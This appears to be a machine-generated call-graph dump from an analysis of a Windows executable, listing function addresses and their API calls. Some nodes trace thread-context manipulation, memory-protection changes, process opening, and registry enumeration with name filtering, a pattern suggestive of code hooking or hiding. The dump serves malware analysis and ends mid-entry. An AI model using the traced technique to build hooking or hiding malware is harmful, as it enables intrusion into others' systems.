9508->9509 9510 13de272d510 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9509->9510 9511 13de2727b02 9510->9511 9511->9502 9512 13de2728828 9511->9512 9515 13de2728bbc 9512->9515 9514 13de2728831 9514->9502 9516 13de2728bcd 9515->9516 9517 13de2728be2 __std_exception_destroy 9515->9517 9518 13de272a370 _CallSETranslator 5 API calls 9516->9518 9517->9514 9518->9517 8925 13de2734fd0 8935 13de2728580 8925->8935 8927 13de2734ff8 8929 13de2728c04 _CallSETranslator 5 API calls 8930 13de2735008 8929->8930 8931 13de2728c04 _CallSETranslator 5 API calls 8930->8931 8932 13de2735011 8931->8932 8939 13de272cc18 8932->8939 8938 13de27285b0 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 8935->8938 8936 13de27286b1 8936->8927 8936->8929 8937 13de2728674 RtlUnwindEx 8937->8938 8938->8936 8938->8937 8940 13de272d398 _invalid_parameter_noinfo 17 API calls 8939->8940 8941 13de272cc21 _invalid_parameter_noinfo 8940->8941 9961 13de2734f50 9962 13de2734f88 __GSHandlerCheckCommon 9961->9962 9963 13de2734fb4 9962->9963 9965 13de272a0c0 9962->9965 9966 13de2728c04 _CallSETranslator 5 API calls 9965->9966 9967 13de272a0ea 9966->9967 9968 13de2728c04 _CallSETranslator 5 API calls 9967->9968 9969 13de272a0f7 9968->9969 9970 13de2728c04 _CallSETranslator 5 API calls 9969->9970 9971 13de272a100 9970->9971 9971->9963 8942 13de272d1d4 8943 13de272d1d9 8942->8943 8947 13de272d1ee 8942->8947 8948 13de272d1f4 8943->8948 8946 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8946->8947 8949 13de272d236 8948->8949 8952 13de272d23e 8948->8952 8950 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8949->8950 8950->8952 8951 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8953 13de272d24b 8951->8953 8952->8951 8954 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8953->8954 8955 13de272d258 8954->8955 8956 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8955->8956 8957 13de272d265 8956->8957 8958 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8957->8958 8959 13de272d272 8958->8959 8960 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8959->8960 8961 13de272d27f 8960->8961 8962 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8961->8962 8963 13de272d28c 8962->8963 8964 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8963->8964 8965 13de272d299 8964->8965 8966 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8965->8966 8967 13de272d2a9 8966->8967 8968 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8967->8968 8969 13de272d2b9 8968->8969 8974 13de272d0a4 8969->8974 8971 13de272d2ce 8979 13de272d01c 8971->8979 8973 13de272d1e6 8973->8946 8975 13de272cf0c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 8974->8975 8977 13de272d0c0 8975->8977 8976 13de272d0f0 8976->8971 8977->8976 8978 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8977->8978 8978->8976 8980 13de272cf0c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 8979->8980 8981 13de272d038 8980->8981 8982 13de272d2ec Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8981->8982 8983 13de272d046 8982->8983 8983->8973 9139 13de272c654 9140 13de272c66d 9139->9140 9153 13de272c669 9139->9153 9141 13de272f200 39 API calls 9140->9141 9142 13de272c672 9141->9142 9154 13de272f75c GetEnvironmentStringsW 9142->9154 9145 13de272c67f 9147 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9145->9147 9146 13de272c68b 9170 13de272c6c8 9146->9170 9147->9153 9150 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9151 13de272c6b2 9150->9151 9152 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9151->9152 9152->9153 9155 13de272c677 9154->9155 9156 13de272f78c 9154->9156 9155->9145 9155->9146 9157 13de272f7e4 FreeEnvironmentStringsW 9156->9157 9158 13de272cf7c 8 API calls 9156->9158 9157->9155 9159 13de272f7f7 9158->9159 9160 13de272f7ff 9159->9160 9161 13de272f808 9159->9161 9162 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9160->9162 9164 13de272f82f 9161->9164 9165 13de272f839 9161->9165 9163 13de272f806 9162->9163 9163->9157 9166 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9164->9166 9167 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9165->9167 9168 13de272f837 FreeEnvironmentStringsW 9166->9168 9167->9168 9168->9155 9171 13de272c6ed 9170->9171 9172 13de272dc3c _invalid_parameter_noinfo 7 API calls 9171->9172 9185 13de272c723 9172->9185 9173 13de272c72b 9174 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9173->9174 9176 13de272c693 9174->9176 9175 13de272c79e 9177 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9175->9177 9176->9150 9177->9176 9178 13de272dc3c _invalid_parameter_noinfo 7 API calls 9178->9185 9179 13de272c78d 9187 13de272c7d8 9179->9187 9180 13de272cc58 __std_exception_copy 20 API calls 9180->9185 9183 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9183->9173 9184 13de272c7c3 9185->9173 9185->9175 9185->9178 9185->9179 9185->9180 9185->9184 9186 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9185->9186 9186->9185 9188 13de272c7dd 9187->9188 9189 13de272c795 9187->9189 9190 13de272c806 9188->9190 9191 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9188->9191 9189->9183 9192 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9190->9192 9191->9188 9192->9189 9972 13de2735b51 __scrt_dllmain_exception_filter 9973 13de2727f52 9974 13de27289a0 __std_exception_copy 20 API calls 9973->9974 9975 13de2727f7d 9974->9975 8984 13de27307d8 8985 13de2730802 8984->8985 8986 13de272dc3c _invalid_parameter_noinfo 7 API calls 8985->8986 8987 13de2730821 8986->8987 8988 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8987->8988 8989 13de273082f 8988->8989 8990 13de272dc3c _invalid_parameter_noinfo 7 API calls 8989->8990 8994 13de2730859 8989->8994 8991 13de273084b 8990->8991 8993 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8991->8993 8993->8994 8995 13de2730862 8994->8995 8996 13de272fb7c 8994->8996 8997 13de272f904 4 API calls 8996->8997 8998 13de272fbb2 8997->8998 8999 13de272fbd1 InitializeCriticalSectionAndSpinCount 8998->8999 9000 13de272fbb7 _invalid_parameter_noinfo 8998->9000 8999->9000 9000->8994 9519 13de2735cd8 9522 13de272b7f8 9519->9522 9523 13de272b85f 9522->9523 9524 13de272b812 9522->9524 9524->9523 9525 13de2728c04 _CallSETranslator 5 API calls 9524->9525 9525->9523 9001 13de27319dc 9002 13de2731a35 9001->9002 9003 13de2731a49 9001->9003 9004 13de272dc1c Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9002->9004 9003->9002 9005 13de2731a4e 9003->9005 9006 13de2731a3a 9004->9006 9008 13de272e724 17 API calls 9005->9008 9009 13de2731a45 9005->9009 9007 13de272dae0 _invalid_parameter_noinfo 20 API calls 9006->9007 9007->9009 9008->9009 9976 13de272fd5c 9977 13de272fd95 9976->9977 9978 13de272fd66 9976->9978 9978->9977 9979 13de272fd7b FreeLibrary 9978->9979 9979->9978 9526 13de27228dc 9528 13de2722922 9526->9528 9527 13de2722984 9528->9527 9529 13de2723858 StrCmpNIW 9528->9529 9529->9528 9010 13de272ffc0 9011 13de272cf0c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 9010->9011 9012 13de272ffd0 9011->9012 9019 13de273227c 9012->9019 9014 13de272ffd9 9015 13de272ffe7 9014->9015 9029 13de272fdc8 GetStartupInfoW 9014->9029 9020 13de27322c4 9019->9020 9021 13de273229b 9019->9021 9022 13de272cf0c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 9020->9022 9023 13de272dc1c Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9021->9023 9027 13de27322ce 9022->9027 9024 13de27322a0 9023->9024 9025 13de272dae0 _invalid_parameter_noinfo 20 API calls 9024->9025 9026 13de27322ac 9025->9026 9026->9014 9027->9026 9040 13de2732184 9027->9040 9030 13de272fdfd 9029->9030 9031 13de272fe97 9029->9031 9030->9031 9032 13de273227c 25 API calls 9030->9032 9035 13de272feb8 9031->9035 9033 13de272fe26 9032->9033 9033->9031 9034 13de272fe50 GetFileType 9033->9034 9034->9033 9036 13de272fed6 9035->9036 9037 13de272ffa5 9036->9037 9038 13de272ff31 GetStdHandle 9036->9038 9037->9015 9038->9036 9039 13de272ff44 GetFileType 9038->9039 9039->9036 9041 13de272dc3c _invalid_parameter_noinfo 7 API calls 9040->9041 9046 13de27321a5 9041->9046 9042 13de2732207 9043 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9042->9043 9044 13de2732211 9043->9044 9044->9027 9045 13de272fb7c 5 API calls 9045->9046 9046->9042 9046->9045 9980 13de2722b40 9982 13de2722bb1 9980->9982 9981 13de2722ef4 9982->9981 9983 13de2722bdd GetModuleHandleA 9982->9983 9984 13de2722bef GetProcAddress 9983->9984 9985 13de2722c01 9983->9985 9984->9985 9985->9981 9986 13de2722c28 StrCmpNIW 9985->9986 9986->9981 9990 13de2722c4d 9986->9990 9987 13de27219a4 6 API calls 9987->9990 9988 13de2722d5f lstrlenW 9988->9990 9989 13de2722e19 lstrlenW 9989->9990 9990->9981 9990->9987 9990->9988 9990->9989 9991 13de2723858 StrCmpNIW 9990->9991 9992 13de2721534 StrCmpIW StrCmpW 9990->9992 9991->9990 9992->9990 9047 13de272f5c4 GetCommandLineA GetCommandLineW 8130 13de2721ac4 8135 13de2721630 GetProcessHeap HeapAlloc 8130->8135 8132 13de2721ada Sleep SleepEx 8133 13de2721ad3 8132->8133 8133->8132 8134 13de27215a0 StrCmpIW StrCmpW 8133->8134 8134->8133 8179 13de2721268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 8135->8179 8137 13de2721658 8180 13de2721268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 8137->8180 8139 13de2721669 8181 13de2721268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 8139->8181 8141 13de2721672 8182 13de2721268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 8141->8182 8143 13de272167b 8144 13de2721696 RegOpenKeyExW 8143->8144 8145 13de27218ae 8144->8145 8146 13de27216c8 RegOpenKeyExW 8144->8146 8145->8133 8147 13de27216f1 8146->8147 8148 13de2721707 RegOpenKeyExW 8146->8148 8183 13de27212bc RegQueryInfoKeyW 8147->8183 8150 13de2721742 RegOpenKeyExW 8148->8150 8151 13de272172b 8148->8151 8154 13de272177d RegOpenKeyExW 8150->8154 8155 13de2721766 8150->8155 8192 13de272104c RegQueryInfoKeyW 8151->8192 8156 13de27217a1 8154->8156 8157 13de27217b8 RegOpenKeyExW 8154->8157 8159 13de27212bc 16 API calls 8155->8159 8160 13de27212bc 16 API calls 8156->8160 8161 13de27217f3 RegOpenKeyExW 8157->8161 8162 13de27217dc 8157->8162 8163 13de2721773 RegCloseKey 8159->8163 8164 13de27217ae RegCloseKey 8160->8164 8166 13de272182e RegOpenKeyExW 8161->8166 8167 13de2721817 8161->8167 8165 13de27212bc 16 API calls 8162->8165 8163->8154 8164->8157 8168 13de27217e9 RegCloseKey 8165->8168 8170 13de2721852 8166->8170 8171 13de2721869 RegOpenKeyExW 8166->8171 8169 13de272104c 6 API calls 8167->8169 8168->8161 8174 13de2721824 RegCloseKey 8169->8174 8175 13de272104c 6 API calls 8170->8175 8172 13de272188d 8171->8172 8173 13de27218a4 RegCloseKey 8171->8173 8176 13de272104c 6 API calls 8172->8176 8173->8145 8174->8166 8177 13de272185f RegCloseKey 8175->8177 8178 13de272189a RegCloseKey 8176->8178 8177->8171 8178->8173 8179->8137 8180->8139 8181->8141 8182->8143 8184 13de2721327 GetProcessHeap HeapAlloc 8183->8184 8185 13de272148a RegCloseKey 8183->8185 8186 13de2721352 RegEnumValueW 8184->8186 8187 13de2721476 GetProcessHeap HeapFree 8184->8187 8185->8148 8188 13de27213a5 8186->8188 8187->8185 8188->8186 8188->8187 8189 13de2721534 2 API calls 8188->8189 8190 13de272141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 8188->8190 8191 13de27213d3 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 8188->8191 8189->8188 8190->8188 8191->8190 8193 13de27211b5 RegCloseKey 8192->8193 8195 13de27210bf 8192->8195 8193->8150 8194 13de27210cf RegEnumValueW 8194->8195 8195->8193 8195->8194 8196 13de272114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 8195->8196 8196->8195 9193 13de2725244 9194 13de272524a 9193->9194 9205 13de272787c 9194->9205 9198 13de27252ae 9199 13de2725347 9199->9198 9202 13de27254cd 9199->9202 9218 13de2727450 9199->9218 9201 13de27255cb 9202->9201 9203 13de2725647 VirtualProtect 9202->9203 9203->9198 9204 13de2725673 GetLastError 9203->9204 9204->9198 9208 13de2727887 9205->9208 9206 13de272528d 9206->9198 9214 13de2723cd0 9206->9214 9207 13de272bdcc _invalid_parameter_noinfo EnterCriticalSection 9207->9208 9208->9206 9208->9207 9209 13de27278a6 9208->9209 9210 13de27278b1 9209->9210 9224 13de2728098 9209->9224 9228 13de27280b8 9210->9228 9215 13de2723ced 9214->9215 9217 13de2723d5c 9215->9217 9237 13de2723f40 9215->9237 9217->9199 9219 13de2727497 9218->9219 9262 13de2727220 9219->9262 9222 13de2727950 _log10_special IsProcessorFeaturePresent 9223 13de27274c1 9222->9223 9223->9199 9225 13de27280a6 std::bad_alloc::bad_alloc 9224->9225 9232 13de2728a58 9225->9232 9227 13de27280b7 9229 13de27280c6 std::bad_alloc::bad_alloc 9228->9229 9230 13de2728a58 Concurrency::cancel_current_task 2 API calls 9229->9230 9231 13de27278b7 9230->9231 9233 13de2728a77 9232->9233 9234 13de2728aa0 RtlPcToFileHeader 9233->9234 9235 13de2728ac2 RaiseException 9233->9235 9236 13de2728ab8 9234->9236 9235->9227 9236->9235 9238 13de2723f64 9237->9238 9239 13de2723f87 9237->9239 9238->9239 9251 13de27239f0 9238->9251 9240 13de2723fbd 9239->9240 9257 13de2723b20 9239->9257 9242 13de2723fed 9240->9242 9246 13de2723b20 2 API calls 9240->9246 9244 13de2724023 9242->9244 9247 13de27239f0 3 API calls 9242->9247 9245 13de272403f 9244->9245 9248 13de27239f0 3 API calls 9244->9248 9249 13de272405b 9245->9249 9250 13de2723b20 2 API calls 9245->9250 9246->9242 9247->9244 9248->9245 9249->9217 9250->9249 9255 13de2723a11 9251->9255 9252 13de2723a80 9252->9239 9253 13de2723a66 VirtualQuery 9253->9252 9253->9255 9254 13de2723a9a VirtualAlloc 9254->9252 9256 13de2723acb GetLastError 9254->9256 9255->9252 9255->9253 9255->9254 9256->9252 9256->9255 9258 13de2723b38 9257->9258 9259 13de2723b8d VirtualQuery 9258->9259 9260 13de2723ba7 9258->9260 9261 13de2723bf2 GetLastError 9258->9261 9259->9258 9259->9260 9260->9240 9261->9258 9263 13de272723b 9262->9263 9264 13de272725f 9263->9264 9265 13de2727251 SetLastError 9263->9265 9264->9222 9265->9264 9530 13de272cec4 9531 13de272cecc 9530->9531 9532 13de272fb7c 5 API calls 9531->9532 9533 13de272cefd 9531->9533 9534 13de272cef9 9531->9534 9532->9531 9536 13de272cf28 9533->9536 9537 13de272cf53 9536->9537 9538 13de272cf57 9537->9538 9539 13de272cf36 DeleteCriticalSection 9537->9539 9538->9534 9539->9537 9993 13de2722544 9995 13de27225c3 9993->9995 9994 13de27226f4 9995->9994 9996 13de2722625 GetFileType 9995->9996 9997 13de2722633 StrCpyW 9996->9997 9998 13de2722649 9996->9998 10000 13de2722658 9997->10000 10009 13de2721a48 GetFinalPathNameByHandleW 9998->10009 10003 13de27226f9 10000->10003 10007 13de2722662 10000->10007 10001 13de2723858 StrCmpNIW 10001->10003 10002 13de2723858 StrCmpNIW 10002->10007 10003->9994 10003->10001 10004 13de2723058 4 API calls 10003->10004 10005 13de2721cb4 2 API calls 10003->10005 10004->10003 10005->10003 10007->9994 10007->10002 10014 13de2723058 StrCmpIW 10007->10014 10018 13de2721cb4 10007->10018 10010 13de2721ab1 10009->10010 10011 13de2721a72 StrCmpNIW 10009->10011 10010->10000 10011->10010 10012 13de2721a8c lstrlenW 10011->10012 10012->10010 10013 13de2721a9e StrCpyW 10012->10013 10013->10010 10015 13de27230a1 PathCombineW 10014->10015 10016 13de272308a StrCpyW StrCatW 10014->10016 10017 13de27230aa 10015->10017 10016->10017 10017->10007 10019 13de2721cd4 10018->10019 10020 13de2721ccb 10018->10020 10019->10007 10021 13de2721534 2 API calls 10020->10021 10021->10019 9266 13de272224c GetProcessIdOfThread GetCurrentProcessId 9267 13de272227d 9266->9267 9268 13de272231a 9266->9268 9273 13de272193c OpenProcess 9267->9273 9271 13de272228f CreateFileW 9271->9268 9272 13de27222d3 WriteFile ReadFile CloseHandle 9271->9272 9272->9268 9274 13de2721991 9273->9274 9275 13de2721968 IsWow64Process 9273->9275 9274->9268 9274->9271 9276 13de2721988 CloseHandle 9275->9276 9277 13de272197a 9275->9277 9276->9274 9277->9276 9540 13de27258c9 9541 13de27258d0 VirtualProtect 9540->9541 9542 13de27258f9 GetLastError 9541->9542 9543 13de27257e0 9541->9543 9542->9543 9544 13de2723ac9 9547 13de2723a16 9544->9547 9545 13de2723a80 9546 13de2723a66 VirtualQuery 9546->9545 9546->9547 9547->9545 9547->9546 9548 13de2723a9a VirtualAlloc 9547->9548 9548->9545 9549 13de2723acb GetLastError 9548->9549 9549->9545 9549->9547 9048 13de27301b0 9049 13de27301e0 9048->9049 9050 13de2730207 9048->9050 9049->9050 9051 13de272d510 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9049->9051 9053 13de27301f4 9049->9053 9052 13de272cf0c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 9050->9052 9055 13de27302dc 9050->9055 9051->9053 9052->9055 9053->9050 9054 13de2730289 9053->9054 9061 13de2730244 9053->9061 9056 13de272dc1c Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9054->9056 9058 13de2730410 9055->9058 9060 13de272d398 _invalid_parameter_noinfo 17 API calls 9055->9060 9064 13de2730343 9055->9064 9057 13de273028e 9056->9057 9059 13de272dae0 _invalid_parameter_noinfo 20 API calls 9057->9059 9059->9061 9062 13de2730333 9060->9062 9063 13de272d398 _invalid_parameter_noinfo 17 API calls 9062->9063 9063->9064 9065 13de272d398 17 API calls _invalid_parameter_noinfo 9064->9065 9065->9064 9066 13de27315b0 9067 13de27315cf 9066->9067 9068 13de2731648 9067->9068 9070 13de27315df 9067->9070 9074 13de27281fc 9068->9074 9072 13de2727950 _log10_special IsProcessorFeaturePresent 9070->9072 9073 13de273163e 9072->9073 9077 13de2728210 IsProcessorFeaturePresent 9074->9077 9076 13de272820a 9078 13de2728227 capture_current_context 9077->9078 9078->9076 9550 13de27310b0 9551 13de27310dd 9550->9551 9552 13de272dc1c Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9551->9552 9557 13de27310f2 _invalid_parameter_noinfo 9551->9557 9553 13de27310e7 9552->9553 9555 13de272dae0 _invalid_parameter_noinfo 20 API calls 9553->9555 9554 13de2727950 _log10_special IsProcessorFeaturePresent 9556 13de27314b0 9554->9556 9555->9557 9557->9554 9558 13de2725cb3 9559 13de2725cc0 9558->9559 9560 13de2725ccc GetThreadContext 9559->9560 9563 13de2725e2a 9559->9563 9561 13de2725cf2 9560->9561 9560->9563 9561->9563 9564 13de2725d19 9561->9564 9562 13de2725e51 VirtualProtect FlushInstructionCache 9562->9563 9563->9562 9565 13de2725f0e 9563->9565 9568 13de2725d9d 9564->9568 9570 13de2725d76 SetThreadContext 9564->9570 9566 13de2725f2e 9565->9566 9569 13de27243f0 VirtualFree 9565->9569 9567 13de2724e00 3 API calls 9566->9567 9573 13de2725f33 9567->9573 9569->9566 9570->9568 9571 13de2725f87 9574 13de2727950 _log10_special IsProcessorFeaturePresent 9571->9574 9572 13de2725f47 ResumeThread 9572->9573 9573->9571 9573->9572 9575 13de2725fcf 9574->9575 8098 13de2722034 8099 13de2722065 8098->8099 8100 13de272217b 8099->8100 8108 13de2722089 8099->8108 8111 13de2722146 8099->8111 8101 13de27221ef 8100->8101 8102 13de2722180 8100->8102 8104 13de27221f4 8101->8104 8101->8111 8119 13de2722f18 GetProcessHeap HeapAlloc 8102->8119 8107 13de2722f18 11 API calls 8104->8107 8105 13de2722198 8105->8111 8106 13de27220c1 StrCmpNIW 8106->8108 8107->8105 8108->8106 8110 13de27220e8 8108->8110 8108->8111 8110->8108 8112 13de2721bfc 8110->8112 8113 13de2721c23 GetProcessHeap HeapAlloc 8112->8113 8114 13de2721c97 8112->8114 8113->8114 8115 13de2721c5e 8113->8115 8114->8110 8116 13de2721c7f GetProcessHeap HeapFree 8115->8116 8125 13de2721534 8115->8125 8116->8114 8124 13de2722f6b 8119->8124 8120 13de2723029 GetProcessHeap HeapFree 8120->8105 8121 13de2723024 8121->8120 8122 13de2722fb6 StrCmpNIW 8122->8124 8123 13de2721bfc 6 API calls 8123->8124 8124->8120 8124->8121 8124->8122 8124->8123 8126 13de272154e 8125->8126 8129 13de2721584 8125->8129 8127 13de272156d StrCmpW 8126->8127 8128 13de2721565 StrCmpIW 8126->8128 8126->8129 8127->8126 8128->8126 8129->8116 9576 13de2722ab4 9577 13de2722b11 9576->9577 9578 13de2722b2c 9577->9578 9579 13de27231f8 3 API calls 9577->9579 9579->9578 9278 13de2732031 9279 13de272dc1c Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9278->9279 9280 13de2732036 9279->9280 9281 13de272dae0 _invalid_parameter_noinfo 20 API calls 9280->9281 9282 13de2732041 9281->9282 10022 13de2722338 10024 13de27223b6 10022->10024 10023 13de27224d3 10024->10023 10025 13de272241b GetFileType 10024->10025 10026 13de272243d 10025->10026 10027 13de2722429 StrCpyW 10025->10027 10028 13de2721a48 4 API calls 10026->10028 10031 13de272244a 10027->10031 10028->10031 10029 13de2723858 StrCmpNIW 10029->10031 10030 13de2723058 4 API calls 10030->10031 10031->10023 10031->10029 10031->10030 10032 13de2721cb4 2 API calls 10031->10032 10032->10031 9283 13de2735c35 9284 13de2728c04 _CallSETranslator 5 API calls 9283->9284 9285 13de2735c4d 9284->9285 9286 13de2728c04 _CallSETranslator 5 API calls 9285->9286 9287 13de2735c68 9286->9287 9288 13de2728c04 _CallSETranslator 5 API calls 9287->9288 9289 13de2735c7c 9288->9289 9290 13de2728c04 _CallSETranslator 5 API calls 9289->9290 9291 13de2735cbe 9290->9291 8197 13de272dc3c 8202 13de272dc4d _invalid_parameter_noinfo 8197->8202 8198 13de272dc9e 8207 13de272dc1c 8198->8207 8199 13de272dc82 HeapAlloc 8201 13de272dc9c 8199->8201 8199->8202 8202->8198 8202->8199 8204 13de272bdcc 8202->8204 8210 13de272be0c 8204->8210 8215 13de272d510 8207->8215 8209 13de272dc25 8209->8201 8213 13de272cf0c EnterCriticalSection 8210->8213 8214 13de2736240 8213->8214 8219 13de272d525 Concurrency::details::SchedulerProxy::DeleteThis 8215->8219 8216 13de272d551 FlsSetValue 8217 13de272d563 8216->8217 8221 13de272d541 _invalid_parameter_noinfo 8216->8221 8231 13de272dc3c 8217->8231 8219->8216 8219->8221 8221->8209 8222 13de272d590 FlsSetValue 8225 13de272d5ae 8222->8225 8226 13de272d59c FlsSetValue 8222->8226 8223 13de272d580 FlsSetValue 8224 13de272d589 8223->8224 8238 13de272dcb4 8224->8238 8243 13de272d104 8225->8243 8226->8224 8230 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 3 API calls 8230->8221 8236 13de272dc4d _invalid_parameter_noinfo 8231->8236 8232 13de272dc9e 8234 13de272dc1c Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 8232->8234 8233 13de272dc82 HeapAlloc 8235 13de272d572 8233->8235 8233->8236 8234->8235 8235->8222 8235->8223 8236->8232 8236->8233 8237 13de272bdcc _invalid_parameter_noinfo EnterCriticalSection 8236->8237 8237->8236 8239 13de272dcea 8238->8239 8240 13de272dcb9 HeapFree 8238->8240 8239->8221 8240->8239 8241 13de272dcd4 Concurrency::details::SchedulerProxy::DeleteThis 8240->8241 8242 13de272dc1c Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 8241->8242 8242->8239 8248 13de272cfdc 8243->8248 8245 13de272d1b6 8251 13de272d05c 8245->8251 8247 13de272d1cb 8247->8230 8249 13de272cf0c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 8248->8249 8250 13de272cff8 8249->8250 8250->8245 8252 13de272cf0c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 8251->8252 8253 13de272d078 8252->8253 8256 13de272d2ec 8253->8256 8255 13de272d08e 8255->8247 8257 13de272d334 Concurrency::details::SchedulerProxy::DeleteThis 8256->8257 8258 13de272d308 Concurrency::details::SchedulerProxy::DeleteThis 8256->8258 8257->8255 8258->8257 8260 13de2730d24 8258->8260 8261 13de2730dc0 8260->8261 8264 13de2730d47 8260->8264 8262 13de2730e13 8261->8262 8265 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8261->8265 8326 13de2730ec4 8262->8326 8264->8261 8269 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8264->8269 8271 13de2730d86 8264->8271 8266 13de2730de4 8265->8266 8267 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8266->8267 8270 13de2730df8 8267->8270 8268 13de2730da8 8272 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8268->8272 8275 13de2730d7a 8269->8275 8276 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8270->8276 8271->8268 8277 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8271->8277 8273 13de2730db4 8272->8273 8279 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8273->8279 8274 13de2730e1f 8278 13de2730e7e 8274->8278 8283 13de272dcb4 7 API calls Concurrency::details::SchedulerProxy::DeleteThis 8274->8283 8286 13de2733538 8275->8286 8281 13de2730e07 8276->8281 8282 13de2730d9c 8277->8282 8279->8261 8284 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8281->8284 8314 13de2733644 8282->8314 8283->8274 8284->8262 8287 13de2733541 8286->8287 8312 13de273363c 8286->8312 8288 13de273355b 8287->8288 8289 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8287->8289 8290 13de273356d 8288->8290 8291 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8288->8291 8289->8288 8292 13de273357f 8290->8292 8293 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8290->8293 8291->8290 8294 13de2733591 8292->8294 8295 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8292->8295 8293->8292 8296 13de27335a3 8294->8296 8298 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8294->8298 8295->8294 8297 13de27335b5 8296->8297 8299 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8296->8299 8300 13de27335c7 8297->8300 8301 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8297->8301 8298->8296 8299->8297 8302 13de27335d9 8300->8302 8303 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8300->8303 8301->8300 8304 13de27335eb 8302->8304 8305 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8302->8305 8303->8302 8306 13de27335fd 8304->8306 8307 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8304->8307 8305->8304 8308 13de2733612 8306->8308 8309 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8306->8309 8307->8306 8310 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8308->8310 8311 13de2733627 8308->8311 8309->8308 8310->8311 8311->8312 8313 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8311->8313 8312->8271 8313->8312 8315 13de2733649 8314->8315 8324 13de27336aa 8314->8324 8316 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8315->8316 8317 13de2733662 8315->8317 8316->8317 8318 13de2733674 8317->8318 8320 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8317->8320 8319 13de2733686 8318->8319 8321 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8318->8321 8322 13de2733698 8319->8322 8323 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8319->8323 8320->8318 8321->8319 8322->8324 8325 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8322->8325 8323->8322 8324->8268 8325->8324 8327 